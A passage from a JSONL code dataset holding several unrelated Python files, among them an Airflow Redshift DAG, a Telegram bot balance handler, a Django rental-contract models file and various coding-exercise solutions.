hv.Points(df, ['lon', 'lat'])\nbaum = datashade(points, x_sampling=1, y_sampling=1, cmap=fire, width=900, height=480)\nbaum_map = map_tiles * baum\n\nbaum_map\n\n\n# In[12]:\n\n\nimport bokeh\nhv.save(baum_map, 'frankfurter_baum.html', backend='bokeh')\n\n\n# In[24]:\n\n\n\n\n\n# In[13]:\n\n\nfrom keplergl import KeplerGl\nimport pandas as pd\nimport geopandas as gpd\n\n\n# In[22]:\n\n\nmap = KeplerGl(height=800)\nmap.add_data(data=df, name=\"test\")\n\n\n# mape = KeplerGl(height=500)\n\n# \n\n# In[23]:\n\n\nmap\n\n\n# In[25]:\n\n\nconfig = map.config\n\n\n# In[29]:\n\n\nmap_2 = KeplerGl(height=800, data={\"test\": df})\nmap_2\n\n\n# In[31]:\n\n\nconfig_2 = map_2.config\nconfig_2\n\n\n# In[32]:\n\n\nmap_2.save_to_html(data={\"test\": df}, config=config_2, file_name=\"Kepler_Baumkataster_Height.html\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"smorrow1/baumkataster_viz","sub_path":"Baumkataster_Visualisierung/Viz/Baumanalyse_Frankfurt.py","file_name":"Baumanalyse_Frankfurt.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43188881895","text":"N = int(input())\nvals = []\nnonzero = None\nfor _ in range(N):\n x, y, h = (int(x) for x in input().split())\n vals.append((x,y,h))\n if h > 0:\n nonzero = (x,y,h)\n\nfor cx in range(0,101):\n for cy in range(0,101):\n H = nonzero[2] + abs(nonzero[0]-cx) + abs(nonzero[1]-cy)\n if H <= 0:\n continue\n\n ok = True\n for x, y, h in vals:\n h2 = max(H - abs(x-cx) - abs(y-cy), 0)\n if h2 != h:\n ok = False\n break\n\n if ok:\n print(cx,cy,H)\n exit()\n\n\n","repo_name":"hitochan777/kata","sub_path":"atcoder/mayokon/20221209/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14310696248","text":"groupAnswers = []\ngroupForms = []\n\nwith open('day6input.txt', 'r') as file:\n for item in file.readlines():\n if item == \"\\n\":\n groupAnswers.append([data for data in groupForms])\n groupForms.clear()\n else:\n groupForms.append(item.strip())\n\ndef part1():\n uniqueCountPerGroup = []\n answerCount = set()\n\n for answerList in groupAnswers:\n for listItem in answerList:\n for answer in listItem:\n answerCount.add(answer)\n \n uniqueCountPerGroup.append(len(answerCount))\n answerCount.clear()\n\n print(f\"Part 1. solution {sum(uniqueCountPerGroup)}\")\n \ndef part2():\n allYesPerGroup = []\n answerCount = {}\n\n for answerList in groupAnswers:\n for listItem in answerList:\n for answer in listItem:\n if answer in answerCount:\n answerCount[answer] += 1\n else:\n answerCount[answer] = 1\n \n allYesPerGroup.append(sum([1 for x in answerCount.keys() if answerCount[x] == len(answerList)]))\n answerCount.clear()\n \n \n print(f\"Part 2. solution {sum(allYesPerGroup)}\")\n\n\npart1()\npart2()","repo_name":"vhrvoje2/AdventOfCode2020","sub_path":"day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8112078068","text":"import io\r\n\r\nf = io.open(r'quotes_filtering.txt', 'r', encoding=\"utf-8\")\r\n\r\nread_data = f.read()\r\ndata=[]\r\nquotes = []\r\nauthors = []\r\na = ''\r\n\r\nfor i in read_data:\r\n if i != '\\n':\r\n a += i\r\n else:\r\n data.append(a)\r\n a = ''\r\n\r\nf.close()\r\na = 0\r\n\r\nfor i in data:\r\n a += 1\r\n if a % 2:\r\n quotes.append(i)\r\n else:\r\n authors.append(i)\r\n\r\nif __name__ == '__main__':\r\n print(quotes)\r\n print(authors)\r\n","repo_name":"Wind-of-fortune/Telegram_Quotebot","sub_path":"read_parsed_file.py","file_name":"read_parsed_file.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72866779024","text":"def to_7sys(n):\r\n c_n = n\r\n l = 0\r\n while c_n > 0:\r\n l += 1\r\n c_n //= 7\r\n\r\n num = [0]*l\r\n\r\n for i in range(l-1, -1, -1):\r\n num[i] = n%7\r\n n //= 7\r\n\r\n return num\r\n#end def\r\n\r\n\r\ndef ile_niep(num):\r\n ilosc = 0\r\n for i in range(len(num)):\r\n if num[i]%2 == 1:\r\n ilosc += 1\r\n return ilosc\r\n#end def\r\n\r\n\r\ndef zgodne(n1, n2):\r\n num1 = to_7sys(n1)\r\n num2 = to_7sys(n2)\r\n return ile_niep(num1) == ile_niep(num2)\r\n#end def\r\n\r\n\r\ndef matrioszka(tab1, tab2):\r\n n1 = len(tab1)\r\n n2 = len(tab2)\r\n for w2 in range(n2-n1):\r\n for k2 in range(n2-n1):\r\n ilosc = 0\r\n for w1 in range(n1):\r\n for k1 in range(n1):\r\n if zgodne(tab1[w1][k1], tab2[w2+w1][k2+k1]):\r\n ilosc += 1\r\n #end for\r\n #end for\r\n if ilosc >= (n1*n1)/3:\r\n return True\r\n #end for\r\n #end for\r\n return False\r\n#end def\r\n\r\nt1 = [[2 for _ in range(3)] for _ in range(3)]\r\nt2 = [[2 for _ in range(10)] for _ in range(10)]\r\nprint(matrioszka(t1, t2))\r\n","repo_name":"bchwast/AGH-WDI","sub_path":"Kolokwia 19_20/k2_grB_ex1.py","file_name":"k2_grB_ex1.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"32704413296","text":"MATRIX_SIZE = 5\nPLAYER = \"A\"\nTARGET = \"x\"\nEMPTY = \".\"\nMOVE_DIRECTION = {\n \"up\": (-1, 0), \"down\": (+1, 0), \"left\": (0, -1), \"right\": (0, +1)\n}\nTARGET_SHOTS_INDICES = [\n\n]\n\n\ndef build_field(n):\n \"\"\"you will be given an integer N for the size of the field with square shape\"\"\"\n field_matrix = []\n for r in range(n):\n field_matrix.append([x for x in input().split(\" \")])\n return field_matrix\n\n\ndef get_player_position(field):\n player_indices = None\n target_count = 0\n for row_idx in range(len(field)):\n for col_idx in range(len(field[row_idx])):\n if field[row_idx][col_idx] == PLAYER:\n player_indices = (row_idx, col_idx)\n if field[row_idx][col_idx] == TARGET:\n target_count += 1\n\n return player_indices, target_count\n\n\ndef get_to_move_cell(player, direction, steps):\n aim_row_idx, aim_col_idx = MOVE_DIRECTION[direction]\n new_row_idx = player[0] + aim_row_idx * steps\n new_col_idx = player[1] + aim_col_idx * steps\n next_player_indices = (new_row_idx, new_col_idx)\n return next_player_indices\n\n\ndef get_update_move_field(field, next_row_idx, next_col_idx, player_position):\n if is_in_range(field, next_row_idx, next_col_idx) and field[next_row_idx][next_col_idx] == EMPTY:\n field[player_position[0]][player_position[1]] = EMPTY\n field[next_row_idx][next_col_idx] = PLAYER\n return field, next_row_idx, next_col_idx\n\n\ndef is_target(field, player_pos, direction):\n dir_row, dir_col = MOVE_DIRECTION[direction]\n aim_row, aim_col = dir_row + player_pos[0], dir_col + player_pos[1]\n\n while True:\n if not is_in_range(field, aim_row, aim_col):\n return False\n if field[aim_row][aim_col] == TARGET:\n target_shot(field, aim_row, aim_col)\n return True\n aim_row, aim_col = aim_row + dir_row, aim_col + dir_col\n\n\ndef target_shot(field, row, col):\n TARGET_SHOTS_INDICES.append([row, col])\n field[row][col] = EMPTY\n\n\ndef is_in_range(field, next_row, next_col):\n return 0 <= next_row < len(field) and 0 <= next_col < len(field)\n\n\ndef are_targets_shot(all_targes, targets_shot):\n return all_targes <= targets_shot\n\n\ndef main(field, lines_count, all_targets=0, targets_shot=0):\n mem_player_pos = []\n for _ in range(lines_count):\n command = input()\n if not mem_player_pos:\n player_position, all_targets = get_player_position(field)\n mem_player_pos.append(player_position)\n else:\n player_position = mem_player_pos[-1]\n\n if command.startswith(\"shoot\"):\n _, direction = command.split(\" \")\n if is_target(field, player_position, direction):\n targets_shot += 1\n\n elif command.startswith(\"move\"):\n _, direction, steps = command.split(\" \")\n steps = int(steps)\n next_row_idx, next_col_idx = get_to_move_cell(player_position, direction, steps)\n if is_in_range(field, next_row_idx, next_col_idx):\n field, row, col = get_update_move_field(field, next_row_idx, next_col_idx, player_position)\n mem_player_pos.append([row, col])\n\n if are_targets_shot(all_targets, targets_shot):\n return all_targets, targets_shot\n\n return all_targets, targets_shot\n\n\ndef print_solution(all_the_targets, all_targets_shot, ALL_TARGET_SHOTS_INDICES):\n if all_targets_shot < all_the_targets:\n print(f\"Training not completed! {all_the_targets - all_targets_shot} targets left.\")\n else:\n print(f\"Training completed! All {all_the_targets} targets hit.\")\n for location in ALL_TARGET_SHOTS_INDICES:\n print(location)\n\n\nstarting_field = build_field(MATRIX_SIZE)\nlines_count = int(input())\nall_targets, targets_shot = main(starting_field, lines_count)\nprint_solution(all_targets, targets_shot, TARGET_SHOTS_INDICES)\n","repo_name":"vvakrilov/python_courses","sub_path":"03. Advanced/12.Regular Exam/02.1.py","file_name":"02.1.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5294303213","text":"from datetime import datetime, timedelta\nimport os\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import PostgresOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, DataQualityOperator)\nfrom helpers import SqlQueries\nfrom sparkify_dimensions_subdag import load_dim_tables_subdag\n\n\ndefault_args = {\n 'owner': 'Saverio Guzzo',\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'retries': 5,\n 'retry_delay': timedelta(minutes=5),\n 'catchup': False\n}\n\nparent_dag = 'Project5_DataPipeline_Airflow'\n\ndag = DAG(parent_dag,\n start_date = datetime.today() - timedelta(days=2),\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='@hourly',\n max_active_runs = 1\n)\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id='Stage_events',\n dag=dag,\n redshift_conn_id=\"redshift\",\n aws_credentials_id=\"aws_credentials\",\n table=\"staging_events\",\n s3_bucket=\"udacity-dend\",\n s3_key=\"log_data\",\n format_file=\"log_json_path.json\"\n)\n\nstage_songs_to_redshift = StageToRedshiftOperator(\n task_id='Stage_songs',\n dag=dag,\n redshift_conn_id=\"redshift\",\n aws_credentials_id=\"aws_credentials\",\n table=\"staging_songs\",\n s3_bucket=\"udacity-dend\",\n s3_key=\"song_data\",\n)\n\nload_songplays_table = LoadFactOperator(\n task_id='Load_songplays_fact_table',\n dag=dag,\n redshift_conn_id=\"redshift\",\n load_fact_query=SqlQueries().songplay_table_insert\n)\n\n# load_user_dimension_table = LoadDimensionOperator(\n# task_id='Load_user_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().users_table_insert\n# )\n\n# load_song_dimension_table = LoadDimensionOperator(\n# task_id='Load_song_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().songs_table_insert\n# )\n\n# load_artist_dimension_table = LoadDimensionOperator(\n# task_id='Load_artist_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().artists_table_insert\n# )\n\n# load_time_dimension_table = LoadDimensionOperator(\n# task_id='Load_time_dim_table',\n# dag=dag,\n# redshift_conn_id=\"redshift\",\n# load_dim_query=SqlQueries().time_table_insert\n# )\n\nload_dim_table_tasks = SubDagOperator(\n task_id = 'Load_dim_tables_tasks',\n subdag=load_dim_tables_subdag(parent_dag,\n 'Load_dim_tables_tasks',\n default_args),\n default_args=default_args,\n dag=dag\n)\n\nrun_quality_checks = DataQualityOperator(\n task_id='Run_data_quality_checks',\n dag=dag,\n redshift_conn_id=\"redshift\",\n tables = [\"artists\", \"songplays\", \"songs\", \"time\", \"users\"]\n)\n\nend_operator = DummyOperator(task_id='Stop_execution', dag=dag)\n\n\nstart_operator >> [stage_events_to_redshift, stage_songs_to_redshift] >> load_songplays_table\nload_songplays_table >> load_dim_table_tasks >> run_quality_checks\nrun_quality_checks >> end_operator","repo_name":"saveriogzz/Udacity_Data_Engineering_Nanodegree","sub_path":"Project5_DataPipelines_Airflow/dags/sparkify_dag.py","file_name":"sparkify_dag.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7535439056","text":"import os\nimport subprocess\nimport io\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom jinja2 import Environment, BaseLoader\n\nbuild_path = os.path.join(\"build-clang-6.0-14\")\n\nbenchmark = os.path.join(build_path, \"test\", \"benchmark_switch\")\n\nout = subprocess.check_output([benchmark, \"--benchmark_format=csv\"])\nstream = io.StringIO(out.decode())\nstream.seek(0)\ndf = pd.read_csv(stream)\n\ndf[\"implementation\"] = df[\"name\"].apply(lambda x: x.split(\"<\")[0])\ndf[\"number\"] = df[\"name\"].apply(lambda x: int(x.split(\"<\")[1].split(\">\")[0]))\n\nplt.style.use(\"ggplot\")\nplt.figure(figsize=(16, 12))\nfor implementation, group in df.groupby(\"implementation\"):\n plt.plot(group[\"number\"], group[\"cpu_time\"], \"o-\", label=implementation)\nplt.legend()\n\ngraph = \"benchmark_switch.png\"\nplt.savefig(os.path.join(\"script\", graph))\n\nintervals = df[df[\"number\"].isin({4, 8, 16, 32, 64, 128})]\ntable = intervals.pivot(index=\"implementation\", columns=\"number\")[\n \"cpu_time\"\n].to_string()\nprint(table)\n\nbenchmark_md = \"\"\"\n# Benchmarks\n\nBenchmarking is done against \"hand-rolled\" switch-case statements. The benchmark problem is inspired by mpark variant's [execute.mpark.cpp](https://github.com/mpark/variant/blob/benchmark/visit.1/execute.mpark.cpp)\n\n![benchmark graph](./{{graph}})\n\n```\n{{table}}\n```\n\"\"\"\n\nrendered = (\n Environment(loader=BaseLoader)\n .from_string(benchmark_md)\n .render(graph=graph, table=table)\n)\n\nwith open(\"script/benchmark.md\", \"w\") as fd:\n print(rendered, file=fd)\n","repo_name":"yuqian90/integral_switch","sub_path":"script/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17314708094","text":"# Given an array of integers, find the first missing positive integer in \n# linear time and constant space. In other words, find the lowest \n# positive integer that does not exist in the array. The array can \n# contain duplicates and negative numbers as well.\n# For example, the input [3, 4, -1, 1] should give 2. The input \n# [1, 2, 0] should give 3.\n# You can modify the input array in-place.\n\narr1 = [3, 4, -1, 1]\narr2 = [1, 2, 0]\n\nfrom Quicksort import quicksort\n\nquicksort(arr1, 0, len(arr1) - 1)\nquicksort(arr2, 0, len(arr2) - 1)\n\ninteger1 = 1\nfor i in range(len(arr1)):\n if arr1[i] == integer1:\n integer1 += 1\n if arr1[i] > integer1:\n break\nprint(integer1)\n\ninteger2 = 1\nfor i in range(len(arr2)):\n if arr2[i] == integer2:\n integer2 += 1\n if arr2[i] > integer2:\n break\nprint(integer2)","repo_name":"reemahs0pr0/Daily-Coding-Problem","sub_path":"Problem3 - Array (Missing_Lowest_Positive_Integer).py","file_name":"Problem3 - Array (Missing_Lowest_Positive_Integer).py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29936462395","text":"import asyncio\nimport decouple\n\nfrom aiogram import Dispatcher, types\nfrom keyboards import inline\nfrom database import users, balance, nft, binance_db, stabpool\n\n\nasync def balance_handler(call: types.CallbackQuery):\n language = await users.user_data(call.from_user.id)\n user_balance = await balance.get_balance(call.from_user.id)\n photo = decouple.config(\"BANNER_BALANCE\")\n dao = await nft.nft_id(call.from_user.id)\n binance_balance = await binance_db.get_binance_ac(call.from_user.id)\n stabpool_data = await stabpool.get_stabpool_data(call.from_user.id)\n stabpool_balance = round(stabpool_data[0], 2) if stabpool_data else None\n stabpool_deposit = round(stabpool_data[1], 2) if stabpool_data else None\n stabpool_withdrawal = round(stabpool_data[2], 2) if stabpool_data else None\n text = f\"Ваш индивидуальный номер участника DAO, зафиксированный в смарт-контракте: {dao}\" \\\n f\"\\n\\n💵 Коллективный аккаунт\" \\\n f\"\\nВаш баланс: {round(user_balance[0], 2)} USDT\" \\\n f\"\\nАктивный депозит: {round(user_balance[1], 2)} USDT\"\n try:\n text += f\"\\n\\n💰 Личный аккаунт\" \\\n f\"\\nБаланс Binance API: {round(binance_balance[0], 2)}\" \\\n f\"\\nБаланс J2M: {round(binance_balance[1], 2)}\" \\\n f\"\\nАктивный депозит: {round(binance_balance[2], 2)}\" if binance_balance is not None else \"\"\n except TypeError:\n pass\n text += f'\\n\\nСтабилизационный пул' \\\n f'\\nБаланс: {stabpool_balance} USDT' if stabpool_balance else ''\n text += f'\\nАктивный депозит: {stabpool_deposit} USDT' if stabpool_deposit else ''\n text += f\"\\n\\n👨‍👦‍👦 Партнерские начисления: {round(user_balance[3], 2)} USDT\"\n text += f\"\\n\\nСумма зарезервированная на вывод (коллективный аккаунт): {round(user_balance[2], 2)} \" \\\n f\"USDT\" if int(user_balance[2]) > 0 else \"\"\n text += f\"\\n\\nСумма зарезервированная на вывод (стабилизационный пул): {stabpool_withdrawal} \" \\\n f\"USDT\" if stabpool_withdrawal else \"\"\n text += \"\\n\\nГрафик работы \" \\\n \"торгового бота\"\n if language[4] == \"EN\":\n text = f\"Your individual participant number in the DAO, recorded in the smart contract: {dao}\" \\\n f\"\\n\\n💵 Collective Account\" \\\n f\"\\nYour Balance: {round(user_balance[0], 2)} USDT\" \\\n f\"\\nActive Deposit: {round(user_balance[1], 2)} USDT\"\n try:\n text += f\"\\n\\n💰 Personal Account\" \\\n f\"\\nBinance API Balance: {round(binance_balance[0], 2)}\" \\\n f\"\\nJ2M Balance: {round(binance_balance[1], 2)}\" \\\n f\"\\nActive Deposit: {round(binance_balance[2], 2)}\" if binance_balance is not None else \"\"\n except TypeError:\n pass\n text += f'\\n\\nStabilization Pool' \\\n f'\\nBalance: {stabpool_balance} USDT' if stabpool_balance else ''\n text += f'\\nActive Deposit: {stabpool_deposit} USDT' if stabpool_deposit else ''\n text += f\"\\n\\n👨‍👦‍👦 Partner Earnings: {round(user_balance[3], 2)} USDT\"\n text += f\"\\n\\nAmount Reserved for Withdrawal (Collective Account): {round(user_balance[2], 2)} \" \\\n f\"USDT\" if int(user_balance[2]) > 0 else \"\"\n text += f\"\\n\\nAmount Reserved for Withdrawal (Stabilization Pool): {stabpool_withdrawal} \" \\\n f\"USDT\" if stabpool_withdrawal else \"\"\n text += \"\\n\\nTrading Bot Work Schedule\"\n photo = decouple.config(\"BANNER_BALANCE_EN\")\n await call.message.delete()\n try:\n if user_balance[4]:\n text_x = await users.get_text(\"Создание кошелька #1\", language[4])\n text_x2 = await users.get_text(\"Создание кошелька #2\", language[4])\n text_x2 = text_x2.replace(\"{ключ}\", f'{user_balance[3]}')\n message = await call.message.answer(text_x)\n await call.bot.send_chat_action(call.message.chat.id, \"typing\")\n await asyncio.sleep(1)\n await call.bot.delete_message(chat_id=call.message.chat.id,\n message_id=message.message_id)\n await call.message.answer(text_x2)\n await call.bot.send_chat_action(call.message.chat.id, \"upload_photo\")\n await asyncio.sleep(1)\n except IndexError:\n pass\n await call.message.answer_photo(\n photo=photo,\n caption=text,\n reply_markup=inline.balance_history(language[4]))\n\n\nasync def withdrawal_refill_history(call: types.CallbackQuery):\n language = await users.user_data(call.from_user.id)\n await call.message.delete()\n history_type = 'OUT' if call.data == 'withdrawal_history' else 'IN'\n if call.data == 'withdrawal_history':\n history_text = 'вывода'\n if language[4] == \"EN\":\n history_text = 'withdrawal'\n else:\n history_text = 'пополнения'\n if language[4] == 'EN':\n history_text = 'refill'\n all_user_data = await balance.get_balance_history(call.from_user.id, history_type)\n for user_data in all_user_data:\n text = f\"Дата: {user_data[0].strftime('%d.%m.%Y %H:%M:%S')}\\nCумма: {user_data[1]}\" \\\n f\"\\nХэш транзакции: {user_data[2]}\" \\\n f\"\\nТип аккаунта: {user_data[3]}\"\n if language[4] == \"EN\":\n hash_ = user_data[2]\n hash_ = 'Personal Account' if hash_ == 'Личный аккаунт' else hash_\n text = f\"Date: {user_data[0].strftime('%d.%m.%Y %H:%M:%S')}\" \\\n f\"\\nAmount: {user_data[1]}\" \\\n f\"\\nTransaction Hash: {hash_}\" \\\n f\"\\nAccount type: {user_data[3]}\"\n await call.message.answer(text)\n if not all_user_data:\n text = f'У вас нет истории {history_text}!'\n if language[4] == \"EN\":\n text = f'You have no {history_text} history!'\n await call.message.answer(text, reply_markup=inline.back_button(language[4]))\n else:\n text = f'Вывод истории завершён!'\n if language[4] == \"EN\":\n text = f'History output completed!'\n await call.message.answer(f\"{text}\", reply_markup=inline.back_button(language[4]))\n\n\ndef register(dp: Dispatcher):\n dp.register_callback_query_handler(balance_handler, text='balance')\n dp.register_callback_query_handler(withdrawal_refill_history,\n lambda c: c.data in ['withdrawal_history', 'refill_history'])\n","repo_name":"west3n/j2mbot","sub_path":"handlers/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29057843829","text":"data = input(\"Data: \")\ndata = data.split(\"/\")\nmeses = {\n 1:\"janeiro\",\n 2:\"fevereiro\",\n 3:\"março\",\n 4:\"abril\",\n 5:\"maio\",\n 6:\"junho\",\n 7:\"julho\",\n 8:\"agosto\",\n 9:\"setembro\",\n 10:\"outubro\",\n 11:\"novembro\",\n 12:\"dezembro\",\n}\n\n# for i in range(len(meses)-1):\n# if data[1] == meses[i]:\n# print(f\"Você nasceu em {data[0]} de {meses[i]} {data[2]}\")","repo_name":"VicRyan007/logica-de-programacao","sub_path":"python/lists/list6.py","file_name":"list6.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23101589282","text":"import string, secrets, sys\nfrom datetime import datetime, timedelta\nfrom math import floor\n\nfrom dateutil.relativedelta import relativedelta\nfrom num2words import num2words\n\nfrom django.core.validators import MinLengthValidator, MaxLengthValidator, RegexValidator, MinValueValidator, \\\n MaxValueValidator, FileExtensionValidator\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.template.defaultfilters import date as data_ptbr\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.auth.models import AbstractUser\nfrom django_resized import ResizedImageField\nfrom home.funcoes_proprias import valor_format, tratar_imagem, cpf_format, cel_format, cep_format\nfrom ckeditor.fields import RichTextField\nfrom home.funcoes_proprias import modelo_variaveis, modelo_condicoes, tamanho_max_mb\n\napenas_numeros = RegexValidator(regex=r'^[0-9]*$', message='Digite apenas números.')\nestados_civis = (\n (0, 'Solteiro(a)'),\n (1, 'Casado(a)'),\n (2, 'Separado(a)'),\n (3, 'Divorciado(a)'),\n (4, 'Viuvo(a)'))\n\n\ndef user_uuid():\n con_codigo = ''.join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(10))\n return f'{con_codigo[:10]}'\n\n\ndef parcela_uuid():\n recibo_codigo = ''.join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in\n range(6))\n return f'{recibo_codigo[:3]}-{recibo_codigo[3:]}'\n\n\n# Gerar o código para o contrato:\ndef gerar_codigo_contrato():\n codigos_existentes = list(Contrato.objects.all().values(\"codigo\").values_list('codigo', flat=True))\n while True:\n con_codigo = ''.join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(10))\n if con_codigo not in codigos_existentes:\n return f'{con_codigo[:5]}-{con_codigo[5:]}'\n\n\nclass Usuario(AbstractUser):\n RG = models.CharField(max_length=9, null=True, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(7), MaxLengthValidator(9), apenas_numeros])\n CPF = models.CharField(max_length=11, null=True, blank=True, unique=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n telefone = models.CharField(max_length=11, null=False, blank=True, unique=True,\n help_text='Celular/Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n email = models.EmailField(unique=True)\n nacionalidade = models.CharField(null=True, blank=True, max_length=40, default='Brasileiro(a)')\n estadocivil = models.IntegerField(null=True, blank=True, verbose_name='Estado Civil', choices=estados_civis)\n ocupacao = models.CharField(null=True, blank=True, max_length=85, verbose_name='Ocupação')\n endereco_completo = models.CharField(null=True, blank=True, max_length=150, verbose_name='Endereço Completo')\n dados_pagamento1 = models.CharField(null=True, blank=True, max_length=90,\n verbose_name='Informações de pagamentos 1',\n help_text='Sua conta PIX ou dados bancários ou carteira crypto, etc...')\n dados_pagamento2 = models.CharField(null=True, blank=True, max_length=90,\n verbose_name='Informações de pagamentos 2')\n uuid = models.CharField(null=False, editable=False, max_length=10, unique=True, default=user_uuid)\n tickets = models.IntegerField(default=10)\n # Outros poderão ter acesso ao uuid por cópias digitais de pdfs que poderão ser repassadas pelo usuário\n\n locat_slots = models.IntegerField(default=2)\n\n vis_ger_ultim_order_by = models.CharField(default='vencimento_atual', null=True, blank=True, max_length=60)\n\n data_eventos_i = models.DateField(blank=True, null=True)\n itens_eventos = models.CharField(blank=True, null=True, max_length=31, default=['1', '2', '3', '4', '5', '6'])\n qtd_eventos = models.IntegerField(blank=True, null=True, default=25)\n ordem_eventos = models.IntegerField(default=1, blank=False)\n\n recibo_ultimo = models.ForeignKey('Contrato', null=True, blank=True, related_name='usuario_recibo_set',\n on_delete=models.SET_NULL)\n recibo_preenchimento = models.IntegerField(null=True, blank=True)\n\n tabela_ultima_data_ger = models.IntegerField(null=True, blank=True)\n tabela_meses_qtd = models.IntegerField(null=True, blank=True)\n tabela_imov_qtd = models.IntegerField(null=True, blank=True)\n tabela_mostrar_ativos = models.BooleanField(null=True, blank=True)\n\n contrato_ultimo = models.ForeignKey('Contrato', null=True, blank=True, related_name='usuario_contrato_set',\n on_delete=models.SET_NULL)\n\n def locat_auto_registro_link(self):\n return reverse('home:Locatario Auto-Registro', args=[self.username, self.uuid])\n\n def nome_completo(self):\n return f'{str(self.first_name)} {str(self.last_name)}'\n\n def primeiro_ultimo_nome(self):\n nome = self.nome_completo().split()\n return f'{nome[0]} {nome[len(nome) - 1]}'\n\n def f_cpf(self):\n if self.CPF:\n return cpf_format(self.CPF)\n\n def f_tel(self):\n if self.telefone:\n return cel_format(self.telefone)\n\n def arrecadacao_total(self):\n try:\n total = 0\n pagamentos = Pagamento.objects.filter(ao_locador=self).values_list('valor_pago')\n\n for pagamento in pagamentos:\n total += int(pagamento[0])\n\n return valor_format(str(total))\n except:\n return None\n\n def arrecadacao_mensal(self):\n try:\n contratos_user = Contrato.objects.ativos_hoje().filter(do_locador=self)\n arrecadacao_mensal = 0\n for contrato in contratos_user:\n arrecadacao_mensal += int(contrato.valor_mensal)\n return valor_format(str(arrecadacao_mensal))\n except:\n return None\n\n def valor_total_contratos_ativos(self):\n try:\n contratos_user = Contrato.objects.ativos_hoje().filter(do_locador=self)\n valor_total_contratos_ativos = 0\n for contrato in contratos_user:\n valor_total_contratos_ativos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos_ativos))\n except:\n return None\n\n def valor_total_contratos(self):\n try:\n contratos_user = Contrato.objects.filter(do_locador=self)\n valor_total_contratos = 0\n for contrato in contratos_user:\n valor_total_contratos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos))\n except:\n return None\n\n def tem_slot_disponivel(self):\n slots = Slot.objects.filter(do_usuario=self)\n for slot in slots:\n if slot.imovel() is None:\n return True\n return False\n\n\nclass SlotsManager(models.Manager):\n def ativos(self):\n slots_qs = self.all()\n lista = []\n for slot in slots_qs:\n if slot.ativado() is True:\n lista.append(slot.pk)\n slots_ativos = Slot.objects.filter(pk__in=lista)\n return slots_ativos\n\n def inativos(self):\n slots_qs = self.all()\n lista = []\n for slot in slots_qs:\n if slot.ativado() is False:\n lista.append(slot.pk)\n slots_inativos = Slot.objects.filter(pk__in=lista)\n return slots_inativos\n\n def inativos_com_imovel(self):\n slots_qs = self.all()\n lista = []\n for slot in slots_qs:\n if slot.ativado() is False and slot.imovel() is not None:\n lista.append(slot.pk)\n slots_inativos = Slot.objects.filter(pk__in=lista)\n return slots_inativos\n\n\nclass Slot(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=False, blank=False, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n gratuito = models.BooleanField(null=False, default=False)\n criado_em = models.DateTimeField(auto_now_add=True)\n tickets = models.PositiveIntegerField(default=0)\n objects = SlotsManager()\n\n class Meta:\n verbose_name_plural = 'Slots'\n ordering = ('pk',)\n\n def __str__(self):\n return (f'{self.pk}: {\"Gratuito\" if self.gratuito else \"Pago\"}/Criado: {self.criado_em}'\n f'/Tickets: {self.tickets}/{self.do_usuario}/{self.imovel()}')\n\n def imovel(self):\n try:\n slots = Slot.objects.filter(do_usuario=self.do_usuario).order_by('pk')\n imoveis = 